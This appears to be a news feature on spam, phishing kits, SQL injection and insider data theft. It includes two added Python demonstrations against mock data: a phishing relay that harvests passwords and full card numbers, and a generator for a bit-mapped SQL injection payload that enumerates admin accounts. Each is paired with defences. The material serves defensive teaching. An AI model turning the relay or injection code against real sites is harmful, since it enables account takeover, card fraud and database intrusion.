Hackers are getting more clever and more greedy. Staff
are being bribed to disclose customer information, and the internet
now hosts a growing army of hijacked PCs that spew an endless
flood of spam, phishing scams and malware on to an ill-defended
world. It is not a pretty picture.
Reading through the security companies' latest reports is enough
to make you turn off the computers, shut down the networks and go
back to quill pens. Well, almost.
The security companies want you to buy their products, of
course, and therefore have an interest in painting the worst of
pictures, but there is enough evidence to show that the situation
is getting worse.
Take spam, for instance. According to security company SoftScan,
90.3% of e-mail was spam during February, and on one Sunday the
level reached 96.22%. And security company Postini said spam
reached 94% last December, up by 114% on the previous December.
Apart from all that wasted bandwidth, you have the problem of
filtering out the good from the bad and the ugly. That takes money
and processing power, and in order to keep out most of the dross,
you inevitably end up quarantining valid messages. In the process,
the e-mail system that has served you well for the past couple of
decades starts to be more troublesome to manage and use.
The inconvenience is the least of the problems, though. Spam
increasingly comes with a vicious payload, designed to take control
of the target computer, and also to steal information from it.
For example, last December the
Happy New Year worm drove the daily volume of
e-mail-borne viruses on the internet up by a factor of 20 on New
Year's weekend. Also known as Nuwar and Mixor, the worm used social
engineering techniques designed to exploit people's expectations of
legitimate New Year's postcards and greetings from friends and
family.
Serious professionals might not fall for that scam, but what
about opening an innocent-looking Word document? According to Ollie
Whitehouse, a threat researcher at Symantec, hackers have been
forced to become more cunning as users get smarter.
He said Symantec detected five zero-day exploits released
against Microsoft Office in the period from July to December 2006.
In this attack method, hackers lure users into opening a word
processing document, presentation or spreadsheet that has been
crafted to exploit an unpatched vulnerability in the application
that opens it.
Opening the file triggers malicious code, which drops a back door
or Trojan dropper on to the machine; that in turn connects out to
fetch a more feature-rich piece of malicious code.
"It appears to be an effective way for these malicious
individuals to compromise the machines of people who would regard
themselves as security-aware. The hacker then uses it to gain
access to personal information, and the machine can be used in a
botnet," said Whitehouse.
Phishing attacks also show no sign of going away. Having started
by targeting the banks, phishers now go for any company with a web
presence that holds customer information.
Paypal, Amazon and eBay have become obvious targets, and Virgin
Media was a recent victim, with a spoofed e-mail asking customers
to re-confirm their account details.
But phishers too are getting more cunning, according to Mikko
Hyppönen, chief technologist at security company F-Secure. He is
especially concerned about the rise of man-in-the-middle
attacks.
"We saw the first real man-in-the-middle attacks about 11 months
ago, one targeting Paypal, the other targeting a big US bank," he
says.
"Last week we found five separate kits for man-in-the-middle
attacks, targeting sites such as Amazon."
He describes one recent attack aimed at a well-known online
retailer: "You get an e-mail asking you to clarify something about
your account. You follow a link and end up on a page that looks
just like the retailer's site. It asks you for your user name and
password, which it sends off to the bad boys just as in traditional
scams.
"But it also uses the user name and password to log into the
real site. It goes to your profile page and it downloads all the
information about you. It then creates a new page, which asks the
user to 'confirm' their details."
Here is the clever bit. Having "legitimate" access to the user's
account, it can present a whole page of valid information to
reassure the user, even a list of their payment details with just
the last four digits of the credit card showing.
In a devious trick of reverse psychology, it then asks the user
to prove who they are by filling in the blanked-out digits of the
credit card number.
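The relay that Hyppönen describes is easier to reason about as code. What follows is an added example, written for this page and not taken from any phishing kit or from F-Secure: a mock retailer, a mock kit that logs in to it with the victim's credentials and echoes the genuine profile back, and one defensive signal (the relay's logins all arrive from the kit's own address) that the article does not mention and is an assumption of this example. All accounts, card numbers and addresses are constructed sample data.

```python
import hmac
from collections import defaultdict

# Constructed sample accounts for the mock retailer (not real data).
ACCOUNTS = {
    "alice": {"password": "correct-horse", "name": "Alice Example",
              "card": "4111111111111111"},
    "bob":   {"password": "hunter2", "name": "Bob Example",
              "card": "5500000000000004"},
}


class Retailer:
    """The genuine site: it authenticates, serves a profile page, and
    records which client address each successful login came from."""

    def __init__(self, accounts):
        self.accounts = accounts
        self.sessions = {}                        # token -> username
        self.logins_by_source = defaultdict(set)  # client addr -> usernames

    def login(self, username, password, source_addr):
        acct = self.accounts.get(username)
        if acct is None or not hmac.compare_digest(acct["password"], password):
            return None
        token = "sess-%d" % (len(self.sessions) + 1)
        self.sessions[token] = username
        self.logins_by_source[source_addr].add(username)
        return token

    def profile(self, token):
        username = self.sessions.get(token)
        if username is None:
            return None
        acct = self.accounts[username]
        # Only the last four digits are shown, as on a real profile page.
        return {"name": acct["name"], "card_last4": acct["card"][-4:]}

    def relay_suspects(self, threshold=2):
        """Defensive signal (an assumption of this example, not from the
        article): a relay kit logs many different victims in from one
        address, which an ordinary customer never does."""
        return sorted(addr for addr, users in self.logins_by_source.items()
                      if len(users) >= threshold)


class PhishingRelay:
    """The kit: a page that looks like the retailer but logs in to the real
    site with the victim's credentials and builds its 'confirm your
    details' page from the genuine profile."""

    def __init__(self, real_site, kit_addr):
        self.real = real_site
        self.kit_addr = kit_addr
        self.stolen = {}  # username -> what the kit has collected so far

    def fake_login(self, username, password):
        # Every login is relayed from the kit's own address.
        token = self.real.login(username, password, self.kit_addr)
        if token is None:
            return {"error": "Login failed"}  # same answer the real site gives
        profile = self.real.profile(token)
        self.stolen[username] = {"password": password,
                                 "last4": profile["card_last4"]}
        # Everything the victim can check on this page is genuine, because
        # it was fetched with the victim's own password a moment ago.
        return {"greeting": "Welcome back, %s" % profile["name"],
                "card_on_file": "**** **** **** " + profile["card_last4"],
                "prompt": "To verify your identity, enter the hidden digits"}

    def fake_confirm(self, username, first12):
        rec = self.stolen[username]
        rec["card"] = first12 + rec["last4"]
        return rec["card"]


def run_attack(victims, kit_addr="203.0.113.7"):
    """Replay the exchange for (username, password, first12) victims and
    return the site and kit so the outcome on both sides can be inspected."""
    site = Retailer(ACCOUNTS)
    kit = PhishingRelay(site, kit_addr)
    for username, password, first12 in victims:
        page = kit.fake_login(username, password)
        if "error" not in page:
            kit.fake_confirm(username, first12)
    return site, kit


if __name__ == "__main__":
    site, kit = run_attack([("alice", "correct-horse", "411111111111"),
                            ("bob", "hunter2", "550000000000")])
    print("kit now holds:", kit.stolen)
    print("addresses logging in as several customers:", site.relay_suspects())
```

The point the simulation makes is that the masked card number proves nothing: the kit can show it precisely because it already holds the password. The only thing a user can verify is where the page came from, and the only thing the site can see is that one client address is logging in as customer after customer.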
Worst of all, Hyppönen says, the attacks are now becoming
available as toolkits on the internet, so everyone can have a try.
And researchers from security company RSA have recently discovered
a new universal man-in-the-middle phishing kit, which allows the
would-be fraudster to create a fraudulent URL via a simple and
user-friendly online interface.
This means that just about any company with an e-commerce
presence could become a target of phishing scams.
Apart from constantly reminding their customers of the dangers
of such attacks, e-commerce companies have little option but to
subscribe to a service. An example is RSA's FraudAction
anti-phishing and anti-pharming service, which operates a broad
monitoring and detection network to block rogue sites quickly.
Of course, it is not just the blunderbuss effect of spam and
phishing that companies need to worry about. Most security
researchers report that hackers are still using crafted attacks to
get into companies to steal information, sometimes sponsored by
rivals looking for competitive information, or even by foreign
governments in some cases.
Hyppönen says his company investigated a handful of such cases
last year, but admits they could be the tip of an otherwise
undiscovered iceberg.
One example comes from Secerno, which specialises in database
protection. Chief executive Paul Davie says one of his clients, an
online travel company, was recently visited by a hacker looking for
crucial information.
"We put systems in before Christmas and reviewed the progress in
January, going through a couple of days' traffic. Out of hundreds
of thousands of instructions, there was just one that contained
some code that sought to find out, using simple bit-mapping within
SQL injection, which standard management accounts the company had
set up as system administrator accounts," says Davie.
"It was beautifully crafted. It was effectively a scouting
instruction, designed to find out where the vulnerabilities lay in
the system. We passed it round to some penetration testers in the
industry. They had not seen this code before, so there was no way
there was a signature looking for it.
"They could find out which of 16 possible administrator accounts
were being used. The owner of the system nearly fell off his chair
when we explained what it could have done."
The Secerno system blocked the attack because it checks for
anomalous behaviour; a signature-based defence would not have
picked it up.
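Davie's "bit-mapping within SQL injection" is worth seeing concretely, along with why a structural check catches it where a signature would not. The following is an added example written for this page, not Secerno's product or the code seen in the incident: a mock travel site with an injectable lookup, a single crafted input whose one returned value packs the existence of 16 candidate administrator accounts into 16 bits, the same lookup with a bound parameter, and a query-shape fingerprint that flags the statement because its structure differs from ordinary traffic. The table names, the list of 16 account names and the sample rows are constructed assumptions.

```python
import re
import sqlite3

# Sixteen "standard" management account names a scout might probe for.
# The list is an assumption of this example; the article does not name them.
CANDIDATES = [
    "sa", "admin", "root", "administrator", "sysadmin", "dba",
    "operator", "manager", "supervisor", "webadmin", "backup",
    "support", "test", "guest", "service", "monitor",
]


def build_db():
    """Constructed sample schema and rows for a mock travel site."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT, is_admin INTEGER);
        INSERT INTO users VALUES ('alice', 0), ('sa', 1), ('bob', 0),
                                 ('webadmin', 1), ('support', 0);
        CREATE TABLE bookings (ref TEXT, passenger TEXT);
        INSERT INTO bookings VALUES ('TRV-1001', 'A. Customer');
    """)
    return con


def vulnerable_sql(ref):
    # The injectable query: user input is spliced straight into the string.
    return "SELECT passenger FROM bookings WHERE ref = '%s'" % ref


def lookup_vulnerable(con, ref):
    return [row[0] for row in con.execute(vulnerable_sql(ref))]


def lookup_fixed(con, ref):
    # Hardened form: the value travels as a bound parameter, never as SQL.
    sql = "SELECT passenger FROM bookings WHERE ref = ?"
    return [row[0] for row in con.execute(sql, (ref,))]


def bitmap_payload(candidates):
    """One crafted input whose single result value is a bitmap: bit i is
    set iff candidates[i] exists as an administrator account."""
    terms = " + ".join(
        "(CASE WHEN EXISTS(SELECT 1 FROM users WHERE username = '%s' "
        "AND is_admin = 1) THEN %d ELSE 0 END)" % (name, 1 << i)
        for i, name in enumerate(candidates)
    )
    # 'x' matches no booking, the UNION row carries the bitmap, and the
    # trailing '--' turns the application's closing quote into a comment.
    return "x' UNION SELECT (%s) -- " % terms


def decode_bitmap(value, candidates):
    """Turn the returned number back into the list of live admin accounts."""
    value = int(value)
    return [name for i, name in enumerate(candidates) if value & (1 << i)]


def query_shape(sql):
    """Structural fingerprint of a statement: string and numeric literals
    replaced by '?', whitespace collapsed, case folded. One code path
    always produces the same shape; the scout's statement does not."""
    shape = re.sub(r"'(?:[^']|'')*'", "?", sql)
    shape = re.sub(r"\b\d+\b", "?", shape)
    return " ".join(shape.split()).upper()


# Baseline learned from ordinary traffic (here, a single clean lookup).
BASELINE_SHAPES = {query_shape(vulnerable_sql("TRV-0000"))}


def is_anomalous(sql):
    return query_shape(sql) not in BASELINE_SHAPES


if __name__ == "__main__":
    con = build_db()
    payload = bitmap_payload(CANDIDATES)
    leaked = lookup_vulnerable(con, payload)[0]
    print("bitmap:", leaked, "->", decode_bitmap(leaked, CANDIDATES))
    print("fixed lookup returns:", lookup_fixed(con, payload))
    print("shape anomalous:", is_anomalous(vulnerable_sql(payload)))
```

Two things follow from running it. First, one request, not sixteen, is enough to learn which of the sixteen accounts are live, which is why the scout could hide in hundreds of thousands of ordinary instructions. Second, the shape check never needs to have seen this particular payload: it only needs to know what the application's own queries look like, and the bound-parameter version removes the problem altogether because the payload is then just a booking reference that matches nothing.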
However, external attacks still only account for about 20% of
the dangers facing system owners. The rest come from insiders with
proper authentication and passwords.
Offshore call centres in India received bad publicity last year
when it was discovered that personal data was being sold by
workers. But the situation is no better in places like Glasgow,
where local police estimate one in 10 call centres has been
infiltrated by criminal gangs, or in Newcastle, where call centre
staff are regularly accosted by crooks with wads of cash trying to
buy personal information.
A company's own staff may pose equal danger, if only by
accident. For instance, the Nationwide employee who had his laptop
stolen last year from his home could hardly have foreseen the
£980,000 fine his employer would have to pay, on account of the
personal information that was stored on the machine.
In that particular case, encrypting the data on the laptop, with
the key held somewhere other than the machine itself, would have
adequately secured it, a solution that Nationwide has since
adopted.
New research from content security company Clearswift flags
further potential problems from younger staff who have grown up
with the internet and who have moved seamlessly into Web 2.0.
A YouGov survey of 1,000 companies found that workers between
the ages of 18 and 29 regarded regular visits to YouTube, MySpace
and blogs as a natural part of their working day. Twenty-seven per
cent admitted spending three or more hours on such sites at work,
and 42% admitted to discussing work-related issues on the
sites.
Companies need to maintain a fine balance between harnessing new
technologies for business benefits and maintaining security, says
Ian Bowles, chief operating officer at Clearswift. And most
workers now expect some level of personal e-mail and internet
access as a right. A blanket ban would be unacceptable in most
organisations.
So what does a company do to prevent this onslaught on its
security, both from the outside and within? The answer is to go
back to basics.
The general consensus among security experts is to assess risks
and manage them through a combination of people, process and
technology.
Apply defence in depth, from the basic anti-virus and anti-spam
functions (which could come as a service) to the more sophisticated
content filtering and behavioural monitoring, in order to control
staff activity. And patch vulnerabilities quickly where they expose
a risk.
It is also important to apply data encryption to sensitive data
so that a stolen laptop or BlackBerry will not be a disaster. But
also make sure you manage the encryption keys so that data is
accessible when you need it, and so that the keys are not stored
on the device they protect.
And finally make sure you train staff to be security-aware.
"If you have a staff culture where people have been made aware
of security and have been told about social engineering exploits,
for instance, then they will avoid a lot of the problems," said
Mark Jones, a partner in charge of security and risk at Atos
Origin.
"It does not need a lot of expense or training, but it can lift
security cost-effectively across the whole organisation."